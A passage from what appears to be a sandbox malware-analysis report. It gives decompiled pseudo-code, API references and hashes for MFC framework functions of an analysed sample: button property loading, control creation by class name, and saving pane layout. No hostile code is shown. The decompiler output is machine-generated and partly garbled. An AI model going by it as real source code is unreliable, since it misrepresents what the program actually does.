				}
				E00CA67E1(_t230 - 0x1c);
				_push(0);
				 *((char*)(_t230 - 4)) = 6;
				_push(_t230 - 0x1c);
				_push("MFCButton_ImageType");
				_t185 = _t230 - 0x40;
				if(E00D0EB78(0, _t230 - 0x40, _t224, _t227, _t247) == 0) {
					L44:
					 *((intOrPtr*)(_t230 - 0x34)) = 0;
					_push(_t230 - 0x34);
					_push("MFCButton_ImageOnTop");
					_push(_t230 - 0x40);
					_t119 = E00D1034D(0, _t224, _t227, _t255);
					_t256 = _t119;
					if(_t119 != 0) {
						 *((intOrPtr*)(_t224 + 0x8c)) =  *((intOrPtr*)(_t230 - 0x34));
					}
					 *((intOrPtr*)(_t230 - 0x38)) = 0;
					_push(_t230 - 0x38);
					_push("MFCButton_ImageOnRight");
					_push(_t230 - 0x40);
					if(E00D1034D(0, _t224, _t227, _t256) != 0) {
						_t122 =  *((intOrPtr*)(_t230 - 0x38));
						 *((intOrPtr*)(_t224 + 0x88)) =  *((intOrPtr*)(_t230 - 0x38));
					}
					E00CA2975(E00D0EB37(E00CA2975(E00CA2975(E00CA2975(E00CA2975(E00CA2975(_t122,  *((intOrPtr*)(_t230 - 0x1c)) - 0x10),  *((intOrPtr*)(_t230 - 0x20)) - 0x10),  *((intOrPtr*)(_t230 - 0x10)) - 0x10),  *((intOrPtr*)(_t230 - 0x24)) - 0x10),  *((intOrPtr*)(_t230 - 0x28)) - 0x10), _t230 - 0x40),  *((intOrPtr*)(_t230 - 0x2c)) - 0x10);
					return E00DDD4FA(0);
				} else {
					_t133 =  *((intOrPtr*)(_t230 - 0x1c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t230 - 0x1c)) - 0xc)) == 0) {
						goto L44;
					} else {
						_t227 = E00DE7BE1(_t185, _t133);
						_t201 = _t227 - 8;
						if(_t201 == 0) {
							E00CC54AE(_t224, 0);
							goto L44;
						} else {
							_t203 = _t201 - 1;
							if(_t203 == 0) {
								L29:
								E00CA67E1(_t230 - 0x14);
								_push(0);
								 *((char*)(_t230 - 4)) = 7;
								_push(_t230 - 0x14);
								_push("MFCButton_ImageID");
								_t205 = _t230 - 0x40;
								if(E00D0EB78(0, _t230 - 0x40, _t224, _t227, _t252) == 0) {
									L42:
									 *((char*)(_t230 - 4)) = 6;
									E00CA2975(_t138,  *((intOrPtr*)(_t230 - 0x14)) - 0x10);
									goto L44;
								} else {
									_t140 =  *((intOrPtr*)(_t230 - 0x14));
									if( *((intOrPtr*)( *((intOrPtr*)(_t230 - 0x14)) - 0xc)) == 0) {
										_t138 = E00CC54AE(_t224, 0);
										goto L42;
									} else {
										_t138 = E00DE7BE1(_t205, _t140);
										_pop(_t209);
										_t255 = _t227 - 0xa;
										if(_t227 != 0xa) {
											__eflags = _t227 - 9;
											if(_t227 != 9) {
												goto L42;
											} else {
												__eflags = _t138;
												if(__eflags != 0) {
													_t227 = _t138 & 0x0000ffff;
													__eflags = _t227;
													if(__eflags == 0) {
														E00CAA4E7(0, _t209, _t224, _t227, __eflags);
														asm("int3");
														_push(_t227);
														_t228 = _t209;
														E00CB236A(0, _t209, __eflags, _t224);
														__eflags =  *(_t228 + 0xb8);
														if( *(_t228 + 0xb8) != 0) {
															ReleaseCapture();
															 *(_t228 + 0xb8) = 0;
														}
														 *((intOrPtr*)(_t228 + 0xac)) = 0;
														 *((intOrPtr*)(_t228 + 0xb0)) = 0;
														 *((intOrPtr*)(_t228 + 0xb4)) = 0;
														 *((intOrPtr*)(_t228 + 0xbc)) = 0;
														InvalidateRect( *(_t228 + 0x20), 0, 1);
														return UpdateWindow( *(_t228 + 0x20));
													} else {
														_t147 =  *(E00CACEEE(0, _t224, _t227, __eflags) + 0xc);
														__eflags = _t147;
														if(__eflags == 0) {
															goto L36;
														} else {
															_t148 = LoadIconA(_t147, _t227);
														}
														goto L40;
													}
												} else {
													L36:
													_t148 = 0;
													L40:
													_t138 = E00CC6EBD(0, _t224, _t224, _t227, __eflags, _t259, _t148, 1, 0, 0, 0, 0);
													goto L42;
												}
											}
										} else {
											_t138 = E00CC6CEE(_t224, _t222, _t255, _t259, _t138, 0, 0, 0);
											goto L42;
										}
									}
								}
							} else {
								_t252 = _t203 != 1;
								if(_t203 != 1) {
									goto L44;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}

0x00cc6118
0x00cc6118
0x00cc6118
0x00cc6118
0x00cc6118
0x00cc611f
0x00cc6124
0x00cc6129
0x00cc613a
0x00cc613d
0x00cc6142
0x00cc6148
0x00cc6150
0x00cc6155
0x00cc6159
0x00cc615d
0x00cc615e
0x00cc6163
0x00cc616d
0x00cc616f
0x00cc6175
0x00cc617e
0x00cc6181
0x00cc61b6
0x00cc6183
0x00cc6183
0x00cc6186
0x00cc61aa
0x00cc6188
0x00cc6188
0x00cc618b
0x00cc619e
0x00cc618d
0x00cc618d
0x00cc6190
0x00cc6192
0x00cc6192
0x00cc6190
0x00cc618b
0x00cc6186
0x00cc6181
0x00cc6175
0x00cc61bf
0x00cc61c2
0x00cc61c3
0x00cc61cb
0x00cc61d3
0x00cc61d5
0x00cc61d9
0x00cc61de
0x00cc61ea
0x00cc61f2
0x00cc61f2
0x00cc61d9
0x00cc61f7
0x00cc61fc
0x00cc6200
0x00cc6204
0x00cc6205
0x00cc620d
0x00cc6212
0x00cc6214
0x00cc621b
0x00cc621b
0x00cc6223
0x00cc6228
0x00cc622c
0x00cc6230
0x00cc6231
0x00cc6240
0x00cc6242
0x00cc6245
0x00cc6248
0x00cc624d
0x00cc6255
0x00cc6260
0x00cc6265
0x00cc626b
0x00cc626b
0x00cc6248
0x00cc6274
0x00cc6279
0x00cc627d
0x00cc6281
0x00cc6282
0x00cc6287
0x00cc6291
0x00cc6293
0x00cc6299
0x00cc62a2
0x00cc62a5
0x00cc62b5
0x00cc62b5
0x00cc62a7
0x00cc62a7
0x00cc62aa
0x00cc6354
0x00cc62b0
0x00cc62b0
0x00cc62b3
0x00000000
0x00000000
0x00cc62b3
0x00cc62aa
0x00cc62a5
0x00cc6299
0x00cc62be
0x00cc62c3
0x00cc62c7
0x00cc62cb
0x00cc62cc
0x00cc62d1
0x00cc62db
0x00cc63bb
0x00cc63be
0x00cc63c1
0x00cc63c2
0x00cc63ca
0x00cc63cb
0x00cc63d0
0x00cc63d2
0x00cc63d7
0x00cc63d7
0x00cc63e0
0x00cc63e3
0x00cc63e4
0x00cc63ec
0x00cc63f4
0x00cc63f6
0x00cc63f9
0x00cc63f9
0x00cc6444
0x00cc6450
0x00cc62e1
0x00cc62e1
0x00cc62e7
0x00000000
0x00cc62ed
0x00cc62f4
0x00cc62f8
0x00cc62fb
0x00cc63b6
0x00000000
0x00cc6301
0x00cc6301
0x00cc6304
0x00cc630f
0x00cc6312
0x00cc6317
0x00cc631b
0x00cc631f
0x00cc6320
0x00cc6325
0x00cc632f
0x00cc63a2
0x00cc63a5
0x00cc63ac
0x00000000
0x00cc6331
0x00cc6331
0x00cc6337
0x00cc639d
0x00000000
0x00cc6339
0x00cc633a
0x00cc633f
0x00cc6340
0x00cc6343
0x00cc635e
0x00cc6361
0x00000000
0x00cc6363
0x00cc6363
0x00cc6365
0x00cc636b
0x00cc636e
0x00cc6370
0x00cc6453
0x00cc6458
0x00cc6459
0x00cc645b
0x00cc645d
0x00cc6464
0x00cc646a
0x00cc646c
0x00cc6472
0x00cc6472
0x00cc647e
0x00cc6484
0x00cc648a
0x00cc6490
0x00cc6496
0x00cc64a7
0x00cc6376
0x00cc637b
0x00cc637e
0x00cc6380
0x00000000
0x00cc6382
0x00cc6384
0x00cc6384
0x00000000
0x00cc6380
0x00cc6367
0x00cc6367
0x00cc6367
0x00cc638a
0x00cc6393
0x00000000
0x00cc6393
0x00cc6365
0x00cc6345
0x00cc634b
0x00000000
0x00cc634b
0x00cc6343
0x00cc6337
0x00cc6306
0x00cc6306
0x00cc6309
0x00000000
0x00000000
0x00000000
0x00000000
0x00cc6309
0x00cc6304
0x00cc62fb
0x00cc62e7

APIs

__EH_prolog3.LIBCMT ref: 00CC611F

Part of subcall function 00CC1628: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00CC1641

Part of subcall function 00D0EB00: __EH_prolog3.LIBCMT ref: 00D0EB07

Part of subcall function 00D0EB78: __EH_prolog3.LIBCMT ref: 00D0EB7F
Part of subcall function 00D0EB78: __fassign.LIBCMT ref: 00D0EC92

LoadIconA.USER32(?,00000000), ref: 00CC6384

Strings

MFCButton_CursorType, xrefs: 00CC6282
MFCButton_Style, xrefs: 00CC615E
TRUE, xrefs: 00CC6255
MFCButton_Autosize, xrefs: 00CC61C3
MFCButton_ImageOnRight, xrefs: 00CC63E4
MFCButton_ImageType, xrefs: 00CC62CC
MFCButton_Tooltip, xrefs: 00CC6205
MFCButton_ImageID, xrefs: 00CC6320
MFCButton_ImageOnTop, xrefs: 00CC63C2
MFCButton_FullTextTool, xrefs: 00CC6231

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3$ByteCharIconLoadMultiWide__fassign
String ID: MFCButton_Autosize$MFCButton_CursorType$MFCButton_FullTextTool$MFCButton_ImageID$MFCButton_ImageOnRight$MFCButton_ImageOnTop$MFCButton_ImageType$MFCButton_Style$MFCButton_Tooltip$TRUE
API String ID: 1416016541-3825445498
Opcode ID: 7d3e8dc02b6e7ec46b57084534298c07d50a0b96bbd48a02c1f458cd991019b5
Instruction ID: 14531484bf1931d726e49bcd03e14adc7363f998e8f1186d4c128a39ae30f877
Opcode Fuzzy Hash: 7d3e8dc02b6e7ec46b57084534298c07d50a0b96bbd48a02c1f458cd991019b5
Instruction Fuzzy Hash: B6A13B7190015AAADF08EBB4CA95FFEB7B8FF05304F18442DE426A7291DB349E45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0F91 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00CC0F91(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t41;
				void* _t45;
				void* _t118;

				_t115 = __edi;
				_t67 = __ebx;
				_push(8);
				E00DDD52C(0xe08f98, __ebx, __edi, __esi);
				_t120 =  *((intOrPtr*)(_t118 + 8));
				if( *((intOrPtr*)(_t118 + 8)) == 0) {
					_t41 = 0;
					__eflags = 0;
				} else {
					_push( *((intOrPtr*)(_t118 + 8)));
					E00CA2ABC(__ebx, _t118 - 0x10, __edi, __esi, _t120);
					_t117 = 0;
					_push("MFCButton");
					 *((intOrPtr*)(_t118 - 4)) = 0;
					_t45 = E00CBFB65(__ebx, __edi, 0, _t118 - 0x10);
					_t121 = _t45;
					if(_t45 == 0) {
						_push("MFCColorButton");
						__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
						if(__eflags == 0) {
							_push("MFCEditBrowse");
							__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
							if(__eflags == 0) {
								_push("MFCFontComboBox");
								__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
								if(__eflags == 0) {
									_push("MFCLink");
									__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
									if(__eflags == 0) {
										_push("MFCMaskedEdit");
										__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
										if(__eflags == 0) {
											_push("MFCMenuButton");
											__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
											if(__eflags == 0) {
												_push("MFCPropertyGrid");
												__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
												if(__eflags == 0) {
													_push("MFCShellList");
													__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
													if(__eflags == 0) {
														_push("MFCShellTree");
														__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
														if(__eflags == 0) {
															_push("MFCVSListBox");
															__eflags = E00CBFB65(_t67, _t115, 0, _t118 - 0x10);
															if(__eflags != 0) {
																_t65 = E00CA9583(__eflags, 0x1f8);
																 *((intOrPtr*)(_t118 - 0x14)) = _t65;
																 *((char*)(_t118 - 4)) = 0xb;
																__eflags = _t65;
																if(__eflags != 0) {
																	_t65 = E00CD4FA6(_t67, _t65, _t115, 0, __eflags);
																	goto L34;
																}
															}
														} else {
															_t65 = E00CA9583(__eflags, 0x90);
															 *((intOrPtr*)(_t118 - 0x14)) = _t65;
															 *((char*)(_t118 - 4)) = 0xa;
															__eflags = _t65;
															if(_t65 != 0) {
																_t65 = E00CD3E1B(_t65);
																goto L34;
															}
														}
													} else {
														_t65 = E00CA9583(__eflags, 0x170);
														 *((intOrPtr*)(_t118 - 0x14)) = _t65;
														 *((char*)(_t118 - 4)) = 9;
														__eflags = _t65;
														if(__eflags != 0) {
															_t65 = E00CD2738(_t65, __eflags);
															goto L34;
														}
													}
												} else {
													_t65 = E00CA9583(__eflags, 0x408);
													 *((intOrPtr*)(_t118 - 0x14)) = _t65;
													 *((char*)(_t118 - 4)) = 8;
													__eflags = _t65;
													if(__eflags != 0) {
														_t65 = E00CCD024(_t67, _t65, _t115, 0, __eflags);
														goto L34;
													}
												}
											} else {
												_t65 = E00CA9583(__eflags, 0x7c8);
												 *((intOrPtr*)(_t118 - 0x14)) = _t65;
												 *((char*)(_t118 - 4)) = 7;
												__eflags = _t65;
												if(__eflags != 0) {
													_t65 = E00CCC978(_t65, __eflags);
													goto L34;
												}
											}
										} else {
											_t65 = E00CA9583(__eflags, 0xb0);
											 *((intOrPtr*)(_t118 - 0x14)) = _t65;
											 *((char*)(_t118 - 4)) = 6;
											__eflags = _t65;
											if(_t65 != 0) {
												_t65 = E00CCA836(_t65);
												goto L34;
											}
										}
									} else {
										_t65 = E00CA9583(__eflags, 0x7c0);
										 *((intOrPtr*)(_t118 - 0x14)) = _t65;
										 *((char*)(_t118 - 4)) = 5;
										__eflags = _t65;
										if(__eflags != 0) {
											_t65 = E00CCA103(_t67, _t65, _t115, 0, __eflags);
											goto L34;
										}
									}
								} else {
									_t65 = E00CA9583(__eflags, 0x90);
									 *((intOrPtr*)(_t118 - 0x14)) = _t65;
									 *((char*)(_t118 - 4)) = 4;
									__eflags = _t65;
									if(__eflags != 0) {
										_t65 = E00CC97D1(_t67, _t65, _t115, 0, __eflags);
										goto L34;
									}
								}
							} else {
								_t65 = E00CA9583(__eflags, 0xd0);
								 *((intOrPtr*)(_t118 - 0x14)) = _t65;
								 *((char*)(_t118 - 4)) = 3;
								__eflags = _t65;
								if(__eflags != 0) {
									_t65 = E00CC85CA(_t67, _t65, _t115, 0, __eflags);
									goto L34;
								}
							}
						} else {
							_t65 = E00CA9583(__eflags, 0x808);
							 *((intOrPtr*)(_t118 - 0x14)) = _t65;
							 *((char*)(_t118 - 4)) = 2;
							__eflags = _t65;
							if(__eflags != 0) {
								_t65 = E00CC761F(_t67, _t65, _t115, __eflags);
								goto L34;
							}
						}
					} else {
						_t65 = E00CA9583(_t121, 0x7a8);
						 *((intOrPtr*)(_t118 - 0x14)) = _t65;
						 *((char*)(_t118 - 4)) = 1;
						_t122 = _t65;
						if(_t65 != 0) {
							_t65 = E00CC5032(_t67, _t65, _t115, 0, _t122);
							L34:
							_t117 = _t65;
						}
					}
					E00CA2975(_t65,  *((intOrPtr*)(_t118 - 0x10)) + 0xfffffff0);
					_t41 = _t117;
				}
				return E00DDD4FA(_t41);
			}

0x00cc0f91
0x00cc0f91
0x00cc0f91
0x00cc0f98
0x00cc0f9d
0x00cc0fa1
0x00cc122f
0x00cc122f
0x00cc0fa7
0x00cc0fa7
0x00cc0fad
0x00cc0fb5
0x00cc0fb7
0x00cc0fbd
0x00cc0fc0
0x00cc0fc7
0x00cc0fc9
0x00cc0ff4
0x00cc1001
0x00cc1003
0x00cc102e
0x00cc103b
0x00cc103d
0x00cc1068
0x00cc1075
0x00cc1077
0x00cc10a2
0x00cc10af
0x00cc10b1
0x00cc10dc
0x00cc10e9
0x00cc10eb
0x00cc1116
0x00cc1123
0x00cc1125
0x00cc1150
0x00cc115d
0x00cc115f
0x00cc118a
0x00cc1197
0x00cc1199
0x00cc11bd
0x00cc11ca
0x00cc11cc
0x00cc11f0
0x00cc11fd
0x00cc11ff
0x00cc1206
0x00cc120c
0x00cc120f
0x00cc1213
0x00cc1215
0x00cc1219
0x00000000
0x00cc1219
0x00cc1215
0x00cc11ce
0x00cc11d3
0x00cc11d9
0x00cc11dc
0x00cc11e0
0x00cc11e2
0x00cc11e6
0x00000000
0x00cc11e6
0x00cc11e2
0x00cc119b
0x00cc11a0
0x00cc11a6
0x00cc11a9
0x00cc11ad
0x00cc11af
0x00cc11b3
0x00000000
0x00cc11b3
0x00cc11af
0x00cc1161
0x00cc1166
0x00cc116c
0x00cc116f
0x00cc1173
0x00cc1175
0x00cc117d
0x00000000
0x00cc117d
0x00cc1175
0x00cc1127
0x00cc112c
0x00cc1132
0x00cc1135
0x00cc1139
0x00cc113b
0x00cc1143
0x00000000
0x00cc1143
0x00cc113b
0x00cc10ed
0x00cc10f2
0x00cc10f8
0x00cc10fb
0x00cc10ff
0x00cc1101
0x00cc1109
0x00000000
0x00cc1109
0x00cc1101
0x00cc10b3
0x00cc10b8
0x00cc10be
0x00cc10c1
0x00cc10c5
0x00cc10c7
0x00cc10cf
0x00000000
0x00cc10cf
0x00cc10c7
0x00cc1079
0x00cc107e
0x00cc1084
0x00cc1087
0x00cc108b
0x00cc108d
0x00cc1095
0x00000000
0x00cc1095
0x00cc108d
0x00cc103f
0x00cc1044
0x00cc104a
0x00cc104d
0x00cc1051
0x00cc1053
0x00cc105b
0x00000000
0x00cc105b
0x00cc1053
0x00cc1005
0x00cc100a
0x00cc1010
0x00cc1013
0x00cc1017
0x00cc1019
0x00cc1021
0x00000000
0x00cc1021
0x00cc1019
0x00cc0fcb
0x00cc0fd0
0x00cc0fd6
0x00cc0fd9
0x00cc0fdd
0x00cc0fdf
0x00cc0fe7
0x00cc121e
0x00cc121e
0x00cc121e
0x00cc0fdf
0x00cc1226
0x00cc122b
0x00cc122b
0x00cc1236

APIs

__EH_prolog3.LIBCMT ref: 00CC0F98

Part of subcall function 00CA2ABC: __EH_prolog3.LIBCMT ref: 00CA2AC3

Part of subcall function 00CC5032: __EH_prolog3.LIBCMT ref: 00CC5039

Strings

MFCButton, xrefs: 00CC0FB7
MFCShellTree, xrefs: 00CC11BD
MFCVSListBox, xrefs: 00CC11F0
MFCFontComboBox, xrefs: 00CC1068
MFCMaskedEdit, xrefs: 00CC10DC
MFCMenuButton, xrefs: 00CC1116
MFCPropertyGrid, xrefs: 00CC1150
MFCLink, xrefs: 00CC10A2
MFCEditBrowse, xrefs: 00CC102E
MFCShellList, xrefs: 00CC118A
MFCColorButton, xrefs: 00CC0FF4

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3
String ID: MFCButton$MFCColorButton$MFCEditBrowse$MFCFontComboBox$MFCLink$MFCMaskedEdit$MFCMenuButton$MFCPropertyGrid$MFCShellList$MFCShellTree$MFCVSListBox
API String ID: 431132790-2110171958
Opcode ID: c54b24d2b340127c9f6b765e638d0a7e22fd84c97576a84b167fbe514e575af4
Instruction ID: 6d79193b94646b1e4b2bb1ae49f14245e8ae6f780924b6658f9cb0e524cd8607
Opcode Fuzzy Hash: c54b24d2b340127c9f6b765e638d0a7e22fd84c97576a84b167fbe514e575af4
Instruction Fuzzy Hash: 77619125A0530699DF15EBF5E806FBEA7E55F46764F2C002EE810E72C3DE748B40A366

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5192 Relevance: 21.2, APIs: 2, Strings: 10, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00CE5192(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t81;
				intOrPtr* _t83;
				intOrPtr _t86;
				intOrPtr _t94;
				intOrPtr* _t96;
				void* _t129;
				intOrPtr* _t134;
				intOrPtr* _t135;
				intOrPtr _t198;
				void* _t200;
				void* _t205;

				_t205 = __eflags;
				E00DDD52C(0xe0ac2d, __ebx, __edi, __esi);
				_t134 = __ecx;
				E00D52263(__ecx, __edi, __esi, _t205, _t200 - 0x18, "Panes",  *((intOrPtr*)(_t200 + 8)), 0x1c);
				_t198 =  *((intOrPtr*)(_t200 + 0xc));
				 *((intOrPtr*)(_t200 - 4)) = 0;
				if(_t198 == 0xffffffff) {
					_t198 = E00CB7697(_t134);
					 *((intOrPtr*)(_t200 + 0xc)) = _t198;
				}
				E00CA67E1(_t200 - 0x14);
				_t81 = _t200 - 0x14;
				 *((char*)(_t200 - 4)) = 1;
				if( *((intOrPtr*)(_t200 + 0x10)) != 0xffffffff) {
					_push( *((intOrPtr*)(_t200 + 0x10)));
					_push(_t198);
					E00CA6953(_t81, "%TsPane-%d%x",  *((intOrPtr*)(_t200 - 0x18)));
				} else {
					_push(_t198);
					E00CA6953(_t81, "%TsPane-%d",  *((intOrPtr*)(_t200 - 0x18)));
				}
				 *((intOrPtr*)(_t200 - 0x28)) = 0;
				 *((intOrPtr*)(_t200 - 0x24)) = 0;
				 *((char*)(_t200 - 4)) = 2;
				_t83 = E00D52432(_t200 - 0x28, 0, 0);
				_t199 =  *((intOrPtr*)(_t200 - 0x14));
				 *((intOrPtr*)(_t200 - 0x10)) = _t83;
				_t185 =  *((intOrPtr*)( *_t83 + 0xc));
				 *0xe17a64( *((intOrPtr*)(_t200 - 0x14)));
				if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0xc))))() != 0) {
					 *0xe17a64();
					_t94 =  *((intOrPtr*)( *((intOrPtr*)( *_t134 + 0x170))))();
					 *((intOrPtr*)(_t200 - 0x20)) = _t94;
					if(_t94 == 0) {
						E00CE290F(_t134);
						_t96 =  *((intOrPtr*)(_t134 + 0xb8));
						 *((intOrPtr*)(_t200 - 0x1c)) = _t96;
						__eflags = _t96;
						if(__eflags != 0) {
							 *0xe17a64();
							 *((intOrPtr*)(_t134 + 0x1f8)) =  *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x194))))();
							 *((intOrPtr*)(_t134 + 0x200)) = E00D5A077( *((intOrPtr*)(_t134 + 0xb8)),  *((intOrPtr*)(_t134 + 0xbc)));
						}
					} else {
						 *0xe17a64(0);
						_t129 =  *((intOrPtr*)( *((intOrPtr*)( *_t134 + 0x228))))();
						_t210 = _t129;
						if(_t129 != 0) {
							GetWindowRect( *(_t129 + 0x20), _t134 + 0x1e8);
						}
					}
					 *0xe17a64("ID",  *((intOrPtr*)(_t134 + 0x180)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t200 - 0x10)))) + 0x38))))();
					 *0xe17a64("RectRecentFloat", _t134 + 0x1e8);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t200 - 0x10)))) + 0x2c))))();
					 *0xe17a64("RectRecentDocked", _t134 + 0x218);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t200 - 0x10)))) + 0x2c))))();
					 *0xe17a64("RecentFrameAlignment",  *((intOrPtr*)(_t134 + 0x1f8)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t200 - 0x10)))) + 0x34))))();
					 *0xe17a64("RecentRowIndex",  *((intOrPtr*)(_t134 + 0x200)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t200 - 0x10)))) + 0x38))))();
					 *0xe17a64("IsFloating",  *((intOrPtr*)(_t200 - 0x20)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t200 - 0x10)))) + 0x38))))();
					 *0xe17a64("MRUWidth",  *((intOrPtr*)(_t134 + 0x13c)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t200 - 0x10)))) + 0x38))))();
					_t185 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t200 - 0x10)))) + 0x38));
					 *0xe17a64("PinState",  *((intOrPtr*)(_t134 + 0x17c)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t200 - 0x10)))) + 0x38))))();
				}
				_push( *((intOrPtr*)(_t200 + 0x10)));
				_push( *((intOrPtr*)(_t200 + 0xc)));
				_push( *((intOrPtr*)(_t200 + 8)));
				_t86 = E00CE19B2(_t134, _t134, _t185, _t199, _t210);
				_t135 =  *((intOrPtr*)(_t200 - 0x28));
				 *((intOrPtr*)(_t200 - 0x20)) = _t86;
				if(_t135 != 0) {
					 *0xe17a64(1);
					_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_t135 + 4))))();
				}
				E00CA2975(E00CA2975(_t86, _t199 - 0x10),  *((intOrPtr*)(_t200 - 0x18)) - 0x10);
				return E00DDD4FA( *((intOrPtr*)(_t200 - 0x20)));
			}

0x00ce5192
0x00ce5199
0x00ce519e
0x00ce51ac
0x00ce51b4
0x00ce51b9
0x00ce51bf
0x00ce51c8
0x00ce51ca
0x00ce51ca
0x00ce51d0
0x00ce51d9
0x00ce51dc
0x00ce51e0
0x00ce51f6
0x00ce51f9
0x00ce5203
0x00ce51e2
0x00ce51e2
0x00ce51ec
0x00ce51f1
0x00ce520b
0x00ce520e
0x00ce5216
0x00ce521a
0x00ce521f
0x00ce5223
0x00ce5228
0x00ce522d
0x00ce523a
0x00ce524a
0x00ce5252
0x00ce5254
0x00ce5259
0x00ce5289
0x00ce528e
0x00ce5294
0x00ce5297
0x00ce5299
0x00ce52a5
0x00ce52bc
0x00ce52c7
0x00ce52c7
0x00ce525b
0x00ce5267
0x00ce526f
0x00ce5271
0x00ce5273
0x00ce527f
0x00ce527f
0x00ce5273
0x00ce52e2
0x00ce52eb
0x00ce5303
0x00ce530c
0x00ce5324
0x00ce532d
0x00ce5344
0x00ce534d
0x00ce5364
0x00ce536d
0x00ce5381
0x00ce538a
0x00ce53a1
0x00ce53aa
0x00ce53bc
0x00ce53c1
0x00ce53ca
0x00ce53ca
0x00ce53cc
0x00ce53d1
0x00ce53d4
0x00ce53d7
0x00ce53dc
0x00ce53df
0x00ce53e4
0x00ce53ef
0x00ce53f7
0x00ce53f7
0x00ce5407
0x00ce5414

APIs

__EH_prolog3.LIBCMT ref: 00CE5199

Part of subcall function 00D52263: __EH_prolog3.LIBCMT ref: 00D5226A
Part of subcall function 00D52263: _strlen.LIBCMT ref: 00D522A1

GetWindowRect.USER32 ref: 00CE527F

Part of subcall function 00CB7697: GetDlgCtrlID.USER32 ref: 00CB76A2

Part of subcall function 00CE290F: GetWindowRect.USER32 ref: 00CE291D

Strings

MRUWidth, xrefs: 00CE5395
IsFloating, xrefs: 00CE5375
%TsPane-%d%x, xrefs: 00CE51FD
RecentRowIndex, xrefs: 00CE5358
PinState, xrefs: 00CE53B5
Panes, xrefs: 00CE51A6
RectRecentDocked, xrefs: 00CE531A
RectRecentFloat, xrefs: 00CE52F9
RecentFrameAlignment, xrefs: 00CE5338
%TsPane-%d, xrefs: 00CE51E6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3RectWindow$Ctrl_strlen
